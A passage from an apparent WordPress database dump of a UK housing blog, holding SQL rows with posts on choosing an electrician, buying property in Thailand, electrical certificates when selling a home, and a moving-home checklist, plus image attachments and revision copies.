target=\"_blank\" rel=\"noopener\">NVQ & Courses for Fully Qualified Electricians Explained.</a>\r\n\r\nOf course, choosing a master electrician means you will be paying a higher fee, but it secures you the highest quality of workmanship and safety. This also means that they will have additional knowledge and can advise you on ways to be energy efficient in order to save money in the future.\r\n<h3>Value for money</h3>\r\nIn general, you should get at least three different quotes, this way you can asses each potential contractor and decide which one suits your requirements best.\r\n<blockquote>A price breakdown is advised within the quote so that the comparisons can be clear and precise and you can consider important factors such as the cost of materials, labour, etc.</blockquote>\r\n<h3>Reviews</h3>\r\nGetting a recommendation from a previous user of their service is always important, especially if you know and trust their opinion as this ensures that they provide a good service. If you cant get a personal recommendation, you can always ask them for a referee or you can check their online reviews, although you must be wary of this option as they are not always genuine.\r\n<h3>Attitude and communication</h3>\r\nIt is important to take note of the attitude and communication skills of your contractor. Things to take into consideration include punctuality to the quote, their appearance, if they have good communication skills, for example, confidence in talking to you about the job and ability to answer any questions you have.\r\n<h3>Choosing the right electrician checklist:</h3>\r\n<ul>\r\n <li>fully licensed and insured</li>\r\n <li>a fair quote</li>\r\n <li>experience in your specific needs</li>\r\n <li>are they recommended</li>\r\n <li>are they a professional</li>\r\n</ul>\r\n<div class=\"fusion-fullwidth fullwidth-box hundred-percent-fullwidth non-hundred-percent-height-scrolling\">\r\n<div class=\"fusion-builder-row fusion-row \">\r\n<div class=\"fusion-layout-column fusion_builder_column fusion_builder_column_1_1 fusion-builder-column-1 fusion-one-full fusion-column-first fusion-column-last fusion-column-no-min-height 1_1\">\r\n<div class=\"fusion-column-wrapper\" data-bg-url=\"\">\r\n\r\n<strong>Following these steps will help secure the right electrician for you.</strong>\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</article></section></div>\r\n</div>\r\n</div>','The best way to choose an electrician','','publish','closed','closed','','the-best-way-to-choose-an-electrician','','','2021-08-20 13:29:21','2021-08-20 13:29:21','',0,'https://housing-today.co.uk/?p=105',0,'post','',0),(121,1,'2019-08-12 12:29:28','2019-08-12 12:29:28','','The best way to choose an electrician','','inherit','closed','closed','','the-best-way-to-choose-an-electrician-2','','','2019-08-12 12:29:28','2019-08-12 12:29:28','',105,'http://housing-today.co.uk/wp-content/uploads/2019/08/The-best-way-to-choose-an-electrician.jpg',0,'attachment','image/jpeg',0),(122,1,'2019-08-12 12:29:29','2019-08-12 12:29:29','','health2','','inherit','closed','closed','','health2','','','2019-08-12 12:29:29','2019-08-12 12:29:29','',105,'http://housing-today.co.uk/wp-content/uploads/2019/08/health2.jpg',0,'attachment','image/jpeg',0),(123,1,'2019-08-12 12:29:30','2019-08-12 12:29:30','','renewable energy','','inherit','closed','closed','','renewable-energy','','','2019-08-12 12:29:30','2019-08-12 12:29:30','',105,'http://housing-today.co.uk/wp-content/uploads/2019/08/renewable-energy.jpg',0,'attachment','image/jpeg',0),(124,1,'2019-08-12 12:29:31','2019-08-12 12:29:31','','Green Energy','','inherit','closed','closed','','green-energy','','','2019-08-12 12:29:31','2019-08-12 12:29:31','',105,'http://housing-today.co.uk/wp-content/uploads/2019/08/Green-Energy.jpg',0,'attachment','image/jpeg',0),(125,1,'2019-08-12 12:29:31','2019-08-12 12:29:31','','roof','','inherit','closed','closed','','roof','','','2019-08-12 12:29:31','2019-08-12 12:29:31','',105,'http://housing-today.co.uk/wp-content/uploads/2019/08/roof.jpg',0,'attachment','image/jpeg',0),(126,1,'2019-08-12 12:29:32','2019-08-12 12:29:32','','young','','inherit','closed','closed','','young','','','2019-08-12 12:29:32','2019-08-12 12:29:32','',105,'http://housing-today.co.uk/wp-content/uploads/2019/08/young.jpg',0,'attachment','image/jpeg',0),(127,1,'2019-08-12 12:29:33','2019-08-12 12:29:33','','Case study','','inherit','closed','closed','','case-study','','','2019-08-12 12:29:33','2019-08-12 12:29:33','',105,'http://housing-today.co.uk/wp-content/uploads/2019/08/Case-study.jpg',0,'attachment','image/jpeg',0),(128,1,'2019-08-12 12:29:34','2019-08-12 12:29:34','','business-training','','inherit','closed','closed','','business-training','','','2019-08-12 12:29:34','2019-08-12 12:29:34','',105,'http://housing-today.co.uk/wp-content/uploads/2019/08/business-training.jpg',0,'attachment','image/jpeg',0),(129,1,'2019-08-12 12:29:34','2019-08-12 12:29:34','','renting2','','inherit','closed','closed','','renting2','','','2019-08-12 12:29:34','2019-08-12 12:29:34','',105,'http://housing-today.co.uk/wp-content/uploads/2019/08/renting2.jpg',0,'attachment','image/jpeg',0),(130,1,'2019-08-12 12:29:35','2019-08-12 12:29:35','','rent','','inherit','closed','closed','','rent','','','2019-08-12 12:29:35','2019-08-12 12:29:35','',105,'http://housing-today.co.uk/wp-content/uploads/2019/08/rent.jpg',0,'attachment','image/jpeg',0),(131,1,'2019-08-12 12:29:36','2019-08-12 12:29:36','','Therapy','','inherit','closed','closed','','therapy','','','2019-08-12 12:29:36','2019-08-12 12:29:36','',105,'http://housing-today.co.uk/wp-content/uploads/2019/08/Therapy.jpg',0,'attachment','image/jpeg',0),(132,1,'2019-08-12 12:29:36','2019-08-12 12:29:36','','Massages','','inherit','closed','closed','','massages','','','2019-08-12 12:29:36','2019-08-12 12:29:36','',105,'http://housing-today.co.uk/wp-content/uploads/2019/08/Massages.jpg',0,'attachment','image/jpeg',0),(135,1,'2019-08-12 15:28:11','2019-08-12 15:28:11','<h1>Moving abroad can be daunting, from the pressure of finding the right area and property for you to arranging dates and sorting out the legal side of things.</h1>\r\nBelow is a list of the key factors you need to take into consideration, in order to make the process as easy as possible.\r\n<h2><a href=\"https://www.thaiembassy.com/thailand/buying-realestate-thailand.php\" target=\"_blank\" rel=\"noopener\">Understanding Thai property Law</a></h2>\r\nThe laws on owning land and properties in each country vary, Thailand is no exception.\r\n\r\nYou must make sure you know and understand Thai property and land laws.\r\n\r\nUnder existing laws, there are complications that hinder foreigners owning property in Thailand.\r\n<h2>Legal Representation</h2>\r\nUnfortunately, when it comes to moving abroad, foreigners are often misled, even by legal professionals, therefore, it is important to make sure you get the best legal representation you can. <a href=\"https://juslaws.com/our-people.php\" target=\"_blank\" rel=\"noopener\">More.</a>\r\n<blockquote>It is vital that you have all of the legal factors of your move complete.</blockquote>\r\nYou can find out more about the legalities of property and of course <a href=\"https://muangthai-realestate.com/properties/\">a wide range of property types for sale</a> in Thailand through local Thai estate agents.\r\n<h2>Take your time</h2>\r\nTime is key in any move, let alone abroad. Rushing into it will only make the process longer and harder.\r\n\r\nWhilst the legal side of things is the most important part, making sure that you take the time to research the various areas and <a href=\"https://muangthai-realestate.com/properties/\" target=\"_blank\" rel=\"noopener\">properties available to you</a>.\r\n<h2><img class=\"size-medium wp-image-150 alignleft\" src=\"http://housing-today.co.uk/wp-content/uploads/2019/08/thai-property-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />Get to know your agent</h2>\r\nA fundamental part of moving is the <strong>estate agent.</strong> Choosing the right real estate agent is a process within itself.\r\n\r\nYou should always ask to see their developers previous work. Make sure you are aware of the way they treat you, if they communicate well or if they try to pressure you into making decisions.\r\n\r\nWhilst they want to sell you the property, they may not do it with the best intentions, so it is vital that you spend time finding the right agent for you.','Top tips for purchasing property in Thailand','','publish','closed','closed','','top-tips-purchasing-property-thailand','','','2021-08-20 13:29:15','2021-08-20 13:29:15','',0,'https://housing-today.co.uk/?p=135',0,'post','',0),(140,1,'2019-08-12 14:15:39','2019-08-12 14:15:39','','nature-3336524_960_720','','inherit','closed','closed','','nature-3336524_960_720','','','2019-08-12 14:15:39','2019-08-12 14:15:39','',135,'http://housing-today.co.uk/wp-content/uploads/2019/08/nature-3336524_960_720.jpg',0,'attachment','image/jpeg',0),(150,1,'2019-08-12 15:05:08','2019-08-12 15:05:08','','thai property','','inherit','closed','closed','','thai-property','','','2019-08-12 15:05:08','2019-08-12 15:05:08','',135,'http://housing-today.co.uk/wp-content/uploads/2019/08/thai-property.jpg',0,'attachment','image/jpeg',0),(158,1,'2019-08-14 10:52:56','2019-08-14 10:52:56','<h2 class=\"article_heading\">It is highly recommended to have an Electrical Certificate that ensures your electrical installations are fit for purpose</h2>\r\n<div class=\"row Network_block article_block\">\r\n<div class=\"col-md-12\">\r\n<h3><strong>What is an electrical certificate</strong></h3>\r\nThe electrical installation condition report is an overview of each electrical installation on the property and confirms its safety.\r\n<h2><strong>Do you need an electrical certificate in order to sell your home?</strong></h2>\r\nNot necessarily.\r\n\r\nIf you are selling your hose it is not a legal requirement that you provide buyers with an electrical certificate.\r\n\r\nWhilst the certificate is not needed, it is recommended by the National Inspections Council that a full inspection of all electrical installations before the property is bought, though this responsibility is on the buyer rather than the seller, which may mean they will ask to see the certificate, in which case it is better to provide such documentation.\r\n<h2><strong>What other certification should I have?</strong></h2>\r\n<blockquote>As of January 2005, if you have had any major electrical work done, you should provide a <a href=\"https://www.mybuilder.com/questions/v/3871/how-to-get-part-p-certificate\" target=\"_blank\">Part P Building Regulation certificate</a> when selling your property, this information should be passed on to the next owner once it is sold.</blockquote>\r\nLocal authorities have the power to force you to remove work done if it does not meet building regulation standards and this legislation applies to all properties, including extensions and conservatories.\r\n\r\nThis can be on work as small as installing a new electrical circuit. Therefore it is important you find the right electrician that is fully qualified, with a range of experience and services to offer, such as Brisbane (AUS) based <a href=\"https://www.speedyelectrical.com.au/domestic.html\" target=\"_blank\">Speedy Electrical</a>. For London choose <a href=\"https://theedamelectricsltd.co.uk/\" target=\"_blank\">https://theedamelectricsltd.co.uk/</a>\r\n<h2><strong><img class=\"wp-image-164 size-full aligncenter\" src=\"http://housing-today.co.uk/wp-content/uploads/2019/08/electrician.jpg\" alt=\"\" width=\"960\" height=\"638\" /></strong></h2>\r\n<h2><strong>Do the same rules apply to properties for rent?</strong></h2>\r\nAgain, there is no official legislation that requires you as a landlord to provide an electrical certificate, although as a landlord, you are however legally required to make sure that your tenants are safe at all times, in terms of the property, therefore if you have safe electrical installations there is no reason why you wouldn\'t offer an electrical certificate.\r\n<h2>How long will it take to get a report?</h2>\r\nAll good electricians provide you with an electrical report with <a href=\"https://www.localelectriciansdirect.co.uk/installation-condition-report-survey?gclid=EAIaIQobChMInayN4piC5AIVyLHtCh09XwZIEAAYBCAAEgKSgvD_BwE\" target=\"_blank\">varying prices</a>, but it is not guaranteed to be a quick process. If it is a fairly new installation or a smaller job, a report can be done within a few hours. However, if the work is older, bigger or more complicated it can take longer.\r\n\r\n</div>\r\n</div>','Is an Electrical certificate necessary when selling your home?','','publish','closed','closed','','is-an-electrical-certificate-necessary-when-selling-your-home','','','2019-08-15 12:07:37','2019-08-15 12:07:37','',0,'https://housing-today.co.uk/?p=158',0,'post','',0),(159,1,'2019-08-14 09:38:46','2019-08-14 09:38:46','','homeimprovements','','inherit','closed','closed','','homeimprovements','','','2019-08-14 09:38:46','2019-08-14 09:38:46','',158,'http://housing-today.co.uk/wp-content/uploads/2019/08/homeimprovements.jpg',0,'attachment','image/jpeg',0),(164,1,'2019-08-14 10:46:14','2019-08-14 10:46:14','','electrician','','inherit','closed','closed','','electrician','','','2019-08-14 10:46:14','2019-08-14 10:46:14','',158,'http://housing-today.co.uk/wp-content/uploads/2019/08/electrician.jpg',0,'attachment','image/jpeg',0),(171,1,'2019-08-14 11:04:41','2019-08-14 11:04:41','','','','inherit','closed','closed','','is-an-electrical-certificate-necessary-when-selling-your-home-2','','','2019-08-14 11:04:48','2019-08-14 11:04:48','',158,'http://housing-today.co.uk/wp-content/uploads/2019/08/IS-AN-ELECTRICAL-CERTIFICATE-NECESSARY-WHEN-SELLING-YOUR-HOME.jpg',0,'attachment','image/jpeg',0),(180,1,'2019-09-12 09:11:55','2019-09-12 09:11:55','<h1>Cleaning your property</h1>\r\n<h3>Eco-friendly house cleaning</h3>\r\nWe all know how important is to use Eco-friendly, pet-friendly, harmless products.\r\n\r\nCleaning a house you are intending to sell this is especially important, as you want to make your property available to accommodate as many people as possible.\r\n\r\nThis is obviously not always an easy task.\r\n<blockquote>Although there are many products on the market with big Eco-labels on them, when you read the label at the back, you find out that they are not as safe as they claim to be.</blockquote>\r\n<h3>Here are some ways to house ready for sale:</h3>\r\n<strong>Replace the equipment</strong>\r\n\r\nIf you need to change a household appliance like a stove or dishwasher, you should find a good quality replacement, not only to please the potential buyers but increase property value.\r\n\r\nLarge appliances are great electricity consumers so try to replace them with Eco ones that save energy, and money to take that strain off potential buyers, and improve your trust with them.\r\n\r\n<strong>Clean efficiently using Eco products</strong>\r\n\r\nInstead of using the big name brand cleaners that contain toxic chemicals when you come to cleaning the property, windows or glass items, you can <a href=\"https://thegreenparent.co.uk/articles/read/make-your-own-cleaning-products\" target=\"_blank\">make your own cleaning mixture</a> that is both eco-friendly and safe around children and pets.\r\n\r\nYou can even make your own mixture to polish the furniture with.\r\n<h3><img class=\"aligncenter wp-image-186 size-full\" src=\"http://housing-today.co.uk/wp-content/uploads/2019/09/cleaning-3977589_960_720.jpg\" alt=\"\" width=\"960\" height=\"639\" /></h3>\r\n<h3>Redirecting your post</h3>\r\nRedirecting your post is one of the most important things you need to do when moving house, if not done, or done incorrectly it can cause problems for longer than necessary.\r\n\r\nRedirecting can seem like a difficult process, but it is a lot easier than you think.\r\n\r\nAll you need to do is go to your local post office and ask about their <a href=\"https://www.postoffice.co.uk/mail/redirection\" target=\"_blank\">redirection services</a>\r\n<h3>Finding a removals company</h3>\r\n<em>top tips for finding a removals company</em>\r\n<ul>\r\n <li>Always try to get at least 4 removal quotes from <a href=\"https://www.ktmollerremovals.com.au/about-us/\" target=\"_blank\">removals companies</a> and gather your moving quotes either from your local area or the area you are planning to move to.\r\nOnce you have your removal quotes to hand it is important to speak with all the removal companies in person.</li>\r\n <li>This will enable you to get a feel for them and will also give you a chance to ask them any questions especially if you have any special requirements.</li>\r\n <li>The tried and tested way of finding a reliable removal company and receiving a genuine removals quote is by asking for testimonials or checking out their website.\r\nCheck to see if they are a part of any associations.</li>\r\n <li>The removal company you get your removal quote from should have a thorough look at your current home and belongings in order to give an accurate costing.</li>\r\n <li>If you are having various removals firms to come and visit make sure you are well prepared. They will want to look over every aspect of your property.</li>\r\n <li>Factors which will change the quote include the number of stairs in the property or to the property doors if you are moving from a flat & whether there is a lift or not. They will also want to ask about access for both ends (moving from & moving to) and is a very important factor to be taken into account.</li>\r\n <li>You will need to figure out what kind of removal service you need. For example, most companies will offer an all in one service that means they will pack and move your things, providing you with all the equipment you need.</li>\r\n <li>If the house removals company you are dealing with does not have suitable insurance, make sure you check if your home contents insurance covers your move.</li>\r\n</ul>\r\n<h3><strong>Changing your bills</strong></h3>\r\nChanging your electric and gas providers is important to make the moving and settling in process easier.\r\n\r\nNot only could this save you money, but it will avoid confusion when it comes to bills and repairs.\r\n\r\nIt may be best to get an <a href=\"https://housing-today.co.uk/blog/the-best-way-to-choose-an-electrician\" target=\"_blank\">electrician</a> in to have a look at what you need so that they can advise you on a provider that suits you, and your need best.\r\n\r\n ','Moving home checklist: tips to ease stress','','publish','closed','closed','','moving-home-checklist-tips-ease-stress','','','2019-09-13 10:14:37','2019-09-13 10:14:37','',0,'https://housing-today.co.uk/?p=180',0,'post','',0),(186,1,'2019-09-12 10:17:57','2019-09-12 10:17:57','','cleaning-3977589_960_720','','inherit','closed','closed','','cleaning-3977589_960_720','','','2019-09-12 10:17:57','2019-09-12 10:17:57','',180,'http://housing-today.co.uk/wp-content/uploads/2019/09/cleaning-3977589_960_720.jpg',0,'attachment','image/jpeg',0),(193,1,'2019-09-12 16:43:57','2019-09-12 16:43:57','<h1>Cleaning your property</h1>\r\n<h3>Eco-friendly house cleaning</h3>\r\nWe all know how important is to use Eco-friendly, pet-friendly, harmless products, especially cleaning a house you are intending to sell, as you want to make your property available to accommodate as many people as possible.\r\n\r\nThis is obviously not always an easy task.\r\n\r\nAlthough there are many products on the market with big Eco-labels on them, when you read the label at the back, you find out that they are not as safe as they claim to be.\r\n\r\n<em>Here are some ways to be an get your house ready for sale with good quality, safe to use products.</em>\r\n\r\nReplace the equipment\r\n\r\nIf you need to change a household appliance like a stove or dishwasher, you should find a good quality replacement, not only to please the potential buyers but increase property value. Large appliances are great electricity consumers so try to replace them with Eco ones that save energy, and money to take that strain off potential buyers, and improve your trust with them.\r\n\r\n<strong>Clean efficiently using Eco products</strong>\r\n\r\nInstead of using the big name brand cleaners that contain toxic chemicals when you come to cleaning the property, windows or glass items, you can <a href=\"https://thegreenparent.co.uk/articles/read/make-your-own-cleaning-products\" target=\"_blank\">make your own cleaning mixture</a> that is both eco-friendly and safe around children and pets. You can even make your own mixture to polish the furniture with\r\n<h3><img class=\"aligncenter wp-image-186 size-full\" src=\"http://housing-today.co.uk/wp-content/uploads/2019/09/cleaning-3977589_960_720.jpg\" alt=\"\" width=\"960\" height=\"639\" /></h3>\r\n<h3>Redirecting your post</h3>\r\nRedirecting your post is one of the most important things you need to do when moving house, if not done, or done incorrectly it can cause problems for longer than necessary.\r\n\r\nRedirecting can seem like a difficult process, but it is a lot easier than you think. All you need to do is go to your local post office and ask about their <a href=\"https://www.postoffice.co.uk/mail/redirection\" target=\"_blank\">redirection services</a>\r\n<h3><strong>Finding a removals company</strong></h3>\r\n<em>top tips for finding a removals company</em>\r\n<ul>\r\n <li>Always try to get at least 4 removal quotes from <a href=\"https://www.ktmollerremovals.com.au/the-procedure/\" target=\"_blank\">removals companies</a> and gather your moving quotes either from your local area or the area you are planning to move to.\r\nOnce you have your removal quotes to hand it is important to speak with all the removal companies in person.</li>\r\n <li>This will enable you to get a feel for them and will also give you a chance to ask them any questions especially if you have any special requirements.</li>\r\n <li>The tried and tested way of finding a reliable removal company and receiving a genuine removals quote is by asking for testimonials or checking out their website.\r\nCheck to see if they are a part of any associations.</li>\r\n <li>The removal company you get your removal quote from should have a thorough look at your current home and belongings in order to give an accurate costing.</li>\r\n <li>If you are having various removals firms to come and visit make sure you are well prepared. They will want to look over every aspect of your property.</li>\r\n <li>Factors which will change the quote include the number of stairs in the property or to the property doors if you are moving from a flat & whether there is a lift or not. They will also want to ask about access for both ends (moving from & moving to) and is a very important factor to be taken into account.</li>\r\n <li>You will need to figure out what kind of removal service you need. For example, most companies will offer an all in one service that means they will pack and move your things, providing you with all the equipment you need.</li>\r\n <li>If the house removals company you are dealing with does not have suitable insurance, make sure you check if your home contents insurance covers your move.</li>\r\n</ul>\r\n \r\n\r\n<strong>Changing your bills</strong>\r\n\r\nChanging your electric and gas providers is important to make the moving and settling in process easier. Not only could this save you money, but it will avoid confusion when it comes to bills and repairs.\r\n\r\nIt may be best to get an <a href=\"https://housing-today.co.uk/blog/the-best-way-to-choose-an-electrician\" target=\"_blank\">electrician</a> in to have a look at what you need so that they can advise you on a provider that suits you, and your need best.\r\n\r\n ','Moving home checklist: tips to ease stress','','inherit','closed','closed','','180-revision-v1','','','2019-09-12 16:43:57','2019-09-12 16:43:57','',180,'https://housing-today.co.uk/blog/180-revision-v1',0,'revision','',0),(194,1,'2019-09-13 09:49:27','2019-09-13 09:49:27','<h1>Cleaning your property</h1>\r\n<h3>Eco-friendly house cleaning</h3>\r\nWe all know how important is to use Eco-friendly, pet-friendly, harmless products, especially cleaning a house you are intending to sell, as you want to make your property available to accommodate as many people as possible.\r\n\r\nThis is obviously not always an easy task.\r\n\r\nAlthough there are many products on the market with big Eco-labels on them, when you read the label at the back, you find out that they are not as safe as they claim to be.\r\n\r\n<em>Here are some ways to be an get your house ready for sale with good quality, safe to use products.</em>\r\n\r\nReplace the equipment\r\n\r\nIf you need to change a household appliance like a stove or dishwasher, you should find a good quality replacement, not only to please the potential buyers but increase property value. Large appliances are great electricity consumers so try to replace them with Eco ones that save energy, and money to take that strain off potential buyers, and improve your trust with them.\r\n\r\n<strong>Clean efficiently using Eco products</strong>\r\n\r\nInstead of using the big name brand cleaners that contain toxic chemicals when you come to cleaning the property, windows or glass items, you can <a href=\"https://thegreenparent.co.uk/articles/read/make-your-own-cleaning-products\" target=\"_blank\">make your own cleaning mixture</a> that is both eco-friendly and safe around children and pets. You can even make your own mixture to polish the furniture with\r\n<h3><img class=\"aligncenter wp-image-186 size-full\" src=\"http://housing-today.co.uk/wp-content/uploads/2019/09/cleaning-3977589_960_720.jpg\" alt=\"\" width=\"960\" height=\"639\" /></h3>\r\n<h3>Redirecting your post</h3>\r\nRedirecting your post is one of the most important things you need to do when moving house, if not done, or done incorrectly it can cause problems for longer than necessary.\r\n\r\nRedirecting can seem like a difficult process, but it is a lot easier than you think. All you need to do is go to your local post office and ask about their <a href=\"https://www.postoffice.co.uk/mail/redirection\" target=\"_blank\">redirection services</a>\r\n<h3><strong>Finding a removals company</strong></h3>\r\n<em>top tips for finding a removals company</em>\r\n<ul>\r\n <li>Always try to get at least 4 removal quotes from <a href=\"https://www.ktmollerremovals.com.au/about-us/\" target=\"_blank\">removals companies</a> and gather your moving quotes either from your local area or the area you are planning to move to.\r\nOnce you have your removal quotes to hand it is important to speak with all the removal companies in person.</li>\r\n <li>This will enable you to get a feel for them and will also give you a chance to ask them any questions especially if you have any special requirements.</li>\r\n <li>The tried and tested way of finding a reliable removal company and receiving a genuine removals quote is by asking for testimonials or checking out their website.\r\nCheck to see if they are a part of any associations.</li>\r\n <li>The removal company you get your removal quote from should have a thorough look at your current home and belongings in order to give an accurate costing.</li>\r\n <li>If you are having various removals firms to come and visit make sure you are well prepared. They will want to look over every aspect of your property.</li>\r\n <li>Factors which will change the quote include the number of stairs in the property or to the property doors if you are moving from a flat & whether there is a lift or not. They will also want to ask about access for both ends (moving from & moving to) and is a very important factor to be taken into account.</li>\r\n <li>You will need to figure out what kind of removal service you need. For example, most companies will offer an all in one service that means they will pack and move your things, providing you with all the equipment you need.</li>\r\n <li>If the house removals company you are dealing with does not have suitable insurance, make sure you check if your home contents insurance covers your move.</li>\r\n</ul>\r\n \r\n\r\n<strong>Changing your bills</strong>\r\n\r\nChanging your electric and gas providers is important to make the moving and settling in process easier. Not only could this save you money, but it will avoid confusion when it comes to bills and repairs.\r\n\r\nIt may be best to get an <a href=\"https://housing-today.co.uk/blog/the-best-way-to-choose-an-electrician\" target=\"_blank\">electrician</a> in to have a look at what you need so that they can advise you on a provider that suits you, and your need best.\r\n\r\n ','Moving home checklist: tips to ease stress','','inherit','closed','closed','','180-revision-v1','','','2019-09-13 09:49:27','2019-09-13 09:49:27','',180,'https://housing-today.co.uk/blog/180-revision-v1',0,'revision','',0),(195,1,'2019-09-13 09:58:37','2019-09-13 09:58:37','<h1>Cleaning your property</h1>\r\n<h3>Eco-friendly house cleaning</h3>\r\nWe all know how important is to use Eco-friendly, pet-friendly, harmless products, especially cleaning a house you are intending to sell, as you want to make your property available to accommodate as many people as possible.\r\n\r\nThis is obviously not always an easy task.\r\n\r\nAlthough there are many products on the market with big Eco-labels on them, when you read the label at the back, you find out that they are not as safe as they claim to be.\r\n\r\n<em>Here are some ways to be an get your house ready for sale with good quality, safe to use products.</em>\r\n\r\nReplace the equipment\r\n\r\nIf you need to change a household appliance like a stove or dishwasher, you should find a good quality replacement, not only to please the potential buyers but increase property value.\r\n\r\nLarge appliances are great electricity consumers so try to replace them with Eco ones that save energy, and money to take that strain off potential buyers, and improve your trust with them.\r\n\r\n<strong>Clean efficiently using Eco products</strong>\r\n\r\nInstead of using the big name brand cleaners that contain toxic chemicals when you come to cleaning the property, windows or glass items, you can <a href=\"https://thegreenparent.co.uk/articles/read/make-your-own-cleaning-products\" target=\"_blank\">make your own cleaning mixture</a> that is both eco-friendly and safe around children and pets.\r\n\r\nYou can even make your own mixture to polish the furniture with.\r\n<h3><img class=\"aligncenter wp-image-186 size-full\" src=\"http://housing-today.co.uk/wp-content/uploads/2019/09/cleaning-3977589_960_720.jpg\" alt=\"\" width=\"960\" height=\"639\" /></h3>\r\n<h3>Redirecting your post</h3>\r\nRedirecting your post is one of the most important things you need to do when moving house, if not done, or done incorrectly it can cause problems for longer than necessary.\r\n\r\nRedirecting can seem like a difficult process, but it is a lot easier than you think. All you need to do is go to your local post office and ask about their <a href=\"https://www.postoffice.co.uk/mail/redirection\" target=\"_blank\">redirection services</a>\r\n<h3><strong>Finding a removals company</strong></h3>\r\n<em>top tips for finding a removals company</em>\r\n<ul>\r\n <li>Always try to get at least 4 removal quotes from <a href=\"https://www.ktmollerremovals.com.au/about-us/\" target=\"_blank\">removals companies</a> and gather your moving quotes either from your local area or the area you are planning to move to.\r\nOnce you have your removal quotes to hand it is important to speak with all the removal companies in person.</li>\r\n <li>This will enable you to get a feel for them and will also give you a chance to ask them any questions especially if you have any special requirements.</li>\r\n <li>The tried and tested way of finding a reliable removal company and receiving a genuine removals quote is by asking for testimonials or checking out their website.\r\nCheck to see if they are a part of any associations.</li>\r\n <li>The removal company you get your removal quote from should have a thorough look at your current home and belongings in order to give an accurate costing.</li>\r\n <li>If you are having various removals firms to come and visit make sure you are well prepared. They will want to look over every aspect of your property.</li>\r\n <li>Factors which will change the quote include the number of stairs in the property or to the property doors if you are moving from a flat & whether there is a lift or not. They will also want to ask about access for both ends (moving from & moving to) and is a very important factor to be taken into account.</li>\r\n <li>You will need to figure out what kind of removal service you need. For example, most companies will offer an all in one service that means they will pack and move your things, providing you with all the equipment you need.</li>\r\n <li>If the house removals company you are dealing with does not have suitable insurance, make sure you check if your home contents insurance covers your move.</li>\r\n</ul>\r\n \r\n\r\n<strong>Changing your bills</strong>\r\n\r\nChanging your electric and gas providers is important to make the moving and settling in process easier. Not only could this save you money, but it will avoid confusion when it comes to bills and repairs.\r\n\r\nIt may be best to get an <a href=\"https://housing-today.co.uk/blog/the-best-way-to-choose-an-electrician\" target=\"_blank\">electrician</a> in to have a look at what you need so that they can advise you on a provider that suits you, and your need best.\r\n\r\n ','Moving home checklist: tips to ease stress','','inherit','closed','closed','','180-revision-v1','','','2019-09-13 09:58:37','2019-09-13 09:58:37','',180,'https://housing-today.co.uk/blog/180-revision-v1',0,'revision','',0),(196,1,'2019-09-13 09:59:28','2019-09-13 09:59:28','<h1>Cleaning your property</h1>\r\n<h3>Eco-friendly house cleaning</h3>\r\nWe all know how important is to use Eco-friendly, pet-friendly, harmless products.\r\n\r\nEspecially cleaning a house you are intending to sell, as you want to make your property available to accommodate as many people as possible.\r\n\r\nThis is obviously not always an easy task.\r\n\r\nAlthough there are many products on the market with big Eco-labels on them, when you read the label at the back, you find out that they are not as safe as they claim to be.\r\n\r\n<em>Here are some ways to be an get your house ready for sale with good quality, safe to use products.</em>\r\n\r\nReplace the equipment\r\n\r\nIf you need to change a household appliance like a stove or dishwasher, you should find a good quality replacement, not only to please the potential buyers but increase property value.\r\n<blockquote>Large appliances are great electricity consumers so try to replace them with Eco ones that save energy, and money to take that strain off potential buyers, and improve your trust with them.</blockquote>\r\n<strong>Clean efficiently using Eco products</strong>\r\n\r\nInstead of using the big name brand cleaners that contain toxic chemicals when you come to cleaning the property, windows or glass items, you can <a href=\"https://thegreenparent.co.uk/articles/read/make-your-own-cleaning-products\" target=\"_blank\">make your own cleaning mixture</a> that is both eco-friendly and safe around children and pets.\r\n\r\nYou can even make your own mixture to polish the furniture with.\r\n<h3><img class=\"aligncenter wp-image-186 size-full\" src=\"http://housing-today.co.uk/wp-content/uploads/2019/09/cleaning-3977589_960_720.jpg\" alt=\"\" width=\"960\" height=\"639\" /></h3>\r\n<h3>Redirecting your post</h3>\r\nRedirecting your post is one of the most important things you need to do when moving house, if not done, or done incorrectly it can cause problems for longer than necessary.\r\n\r\nRedirecting can seem like a difficult process, but it is a lot easier than you think. All you need to do is go to your local post office and ask about their <a href=\"https://www.postoffice.co.uk/mail/redirection\" target=\"_blank\">redirection services</a>\r\n<h3><strong>Finding a removals company</strong></h3>\r\n<em>top tips for finding a removals company</em>\r\n<ul>\r\n <li>Always try to get at least 4 removal quotes from <a href=\"https://www.ktmollerremovals.com.au/about-us/\" target=\"_blank\">removals companies</a> and gather your moving quotes either from your local area or the area you are planning to move to.\r\nOnce you have your removal quotes to hand it is important to speak with all the removal companies in person.</li>\r\n <li>This will enable you to get a feel for them and will also give you a chance to ask them any questions especially if you have any special requirements.</li>\r\n <li>The tried and tested way of finding a reliable removal company and receiving a genuine removals quote is by asking for testimonials or checking out their website.\r\nCheck to see if they are a part of any associations.</li>\r\n <li>The removal company you get your removal quote from should have a thorough look at your current home and belongings in order to give an accurate costing.</li>\r\n <li>If you are having various removals firms to come and visit make sure you are well prepared. They will want to look over every aspect of your property.</li>\r\n <li>Factors which will change the quote include the number of stairs in the property or to the property doors if you are moving from a flat & whether there is a lift or not. They will also want to ask about access for both ends (moving from & moving to) and is a very important factor to be taken into account.</li>\r\n <li>You will need to figure out what kind of removal service you need. For example, most companies will offer an all in one service that means they will pack and move your things, providing you with all the equipment you need.</li>\r\n <li>If the house removals company you are dealing with does not have suitable insurance, make sure you check if your home contents insurance covers your move.</li>\r\n</ul>\r\n \r\n\r\n<strong>Changing your bills</strong>\r\n\r\nChanging your electric and gas providers is important to make the moving and settling in process easier. Not only could this save you money, but it will avoid confusion when it comes to bills and repairs.\r\n\r\nIt may be best to get an <a href=\"https://housing-today.co.uk/blog/the-best-way-to-choose-an-electrician\" target=\"_blank\">electrician</a> in to have a look at what you need so that they can advise you on a provider that suits you, and your need best.\r\n\r\n ','Moving home checklist: tips to ease stress','','inherit','closed','closed','','180-revision-v1','','','2019-09-13 09:59:28','2019-09-13 09:59:28','',180,'https://housing-today.co.uk/blog/180-revision-v1',0,'revision','',0),(197,1,'2019-09-13 10:00:39','2019-09-13 10:00:39','<h1>Cleaning your property</h1>\r\n<h3>Eco-friendly house cleaning</h3>\r\nWe all know how important is to use Eco-friendly, pet-friendly, harmless products.\r\n\r\nEspecially cleaning a house you are intending to sell, as you want to make your property available to accommodate as many people as possible.\r\n\r\nThis is obviously not always an easy task.\r\n\r\nAlthough there are many products on the market with big Eco-labels on them, when you 